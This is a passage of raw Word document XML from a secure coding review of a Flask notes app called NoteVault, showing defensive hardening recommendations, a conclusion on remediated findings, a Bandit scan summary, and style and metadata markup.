        <w:t xml:space="preserve">Input handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Treat all external input — query strings, form fields, headers, cookies, uploaded files, and even data from your own database if it originated from a user — as untrusted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use parameterized queries or an ORM for all database access; never build queries via string concatenation or formatting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Validate input against an allowlist (expected format, length, type) rather than trying to block known-bad patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Output handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rely on your templating engine's automatic escaping (Jinja2 autoescape) rather than building HTML manually; never disable autoescaping for user-controlled content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set a Content-Security-Policy as defense-in-depth against any XSS that slips through.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">AuthN / AuthZ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hash passwords with a slow, salted algorithm (bcrypt, scrypt, or Argon2 / PBKDF2 via Werkzeug).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforce authorization at the data-access layer (scope queries to the requesting user), not just at the UI layer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Regenerate the session on privilege change (login, logout, role change) and set HttpOnly / Secure / SameSite cookie flags.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Secrets and configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Never commit secrets to source control; load them from environment variables or a secrets manager, and fail startup if missing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Keep debug mode and verbose error pages off in any environment reachable outside a developer's own machine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dangerous operations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avoid shell=True and string-built shell commands; use argument-list subprocess calls and allowlist any user-influenced part of a command.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Avoid pickle (or any code-executing deserializer) on data that ever crosses a trust boundary; prefer JSON plus explicit validation, or a signed format if tamper-evidence is required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Validate and constrain server-side requests (SSRF): allowlist destination hosts, block private/loopback ranges, and disable redirect-following by default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run static analysis (Bandit, Semgrep, or similar) in CI on every pull request, not just periodically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pair automated scanning with periodic manual review — logic flaws like IDOR and broken access control are the category automated tools miss most often.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Track dependencies with a software composition analysis (SCA) tool and patch on a defined cadence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">NoteVault's initial state contained a broad, representative cross-section of common web application vulnerabilities — the kind that recur across real codebases in similar forms. The remediated version included with this report resolves every finding above through standard, well-established controls: parameterized queries, framework-native escaping, salted password hashing, allowlist-based authorization checks, safe subprocess handling, JSON in place of pickle, path containment checks, upload restrictions, CSRF tokens, hardened session cookies, and baseline security headers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">None of these fixes require exotic tooling — they are default-safe patterns already available in Flask and its standard ecosystem. The main organizational takeaway is process, not technology: automated static analysis should run continuously in CI, and it should be paired with periodic manual review, since roughly a third of the findings in this report (authorization and session-handling issues) are structurally invisible to pattern-matching tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix A — Bandit Output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.1 Before remediation (excerpt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Full output saved alongside this report as bandit_output.txt. Summary: 4 Low, 6 Medium, 3 High severity issues across 9 distinct checks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.2 After remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Full output saved alongside this report as bandit_output_fixed.txt. Summary: 3 Low severity issues remain, all informational (Bandit flagging the mere presence of the subprocess module, which is now called safely with an argument list and a host allowlist rather than shell=True).</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472"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Secure Coding Review — NoteVault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1F2937"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F2937"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="5B647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2026-07-23T22:18:43.640Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-23T22:18:43.653Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>